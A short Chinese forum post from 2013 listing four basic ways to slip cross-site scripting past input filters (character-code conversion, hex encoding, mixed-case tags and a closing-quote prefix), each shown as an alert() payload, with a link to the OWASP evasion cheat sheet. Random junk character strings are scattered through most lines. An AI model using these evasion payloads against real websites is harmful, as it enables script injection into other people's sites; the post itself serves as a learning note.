四种超级基础的绕过方法。
, {1 n, D6 l6 }6 _: S) I {1.转换为ASCII码
! i; D: A! p _; G/ {例子:原脚本为<script>alert(‘I love F4ck’)</script >$ v* v# @0 o. ^: c ^
通过转换,变成:9 @+ G) v5 @9 R* b" i# j5 h
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>
: K) x% N& E, m0 n 9 n; A6 U+ G1 P
2.转换为HEX(十六进制), y) e: d$ P2 z6 N
例子:原脚本为<script>alert(‘I love F4ck’)</script>
! r7 T7 j, X2 i4 Q: T9 i通过转换,变成:. \7 P0 F9 C8 c7 r" h: {" x
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e4 V X+ F4 ]5 T1 r, t2 M6 p8 U4 \
/ J# u$ j ?: m1 ~) a$ g
3.转换脚本的大小写, a) C$ V1 e4 q5 E' ?
例子:原脚本为<script>alert(‘I love F4ck’)</script>, S" R2 e8 ?) P- k* N$ j% s z! {. a1 W
转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT> s& k S; O6 N
( Y: V! i& L5 G* {" k
4.增加闭合标记”>
) a5 W. n' {' G4 D例子:原脚本为<script>alert(‘I love F4ck’)</script>. d l7 T3 J( t( D" b2 R
转换为:”><script>alert(‘I love F4ck’)</script> m& [: Z0 u( U: S% @$ L' U
更详细绕过技术请参考此网页
+ r' E( r; r* r# m& F4 @0 U. ghttps://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
' K6 i: N4 f* q
7 z3 |8 G7 g# c7 K5 Y; `0 B转换工具使用的是火狐的 hackbar mozilla addon. |
发表于 2013-2-14 00:10:39
收藏
支持
反对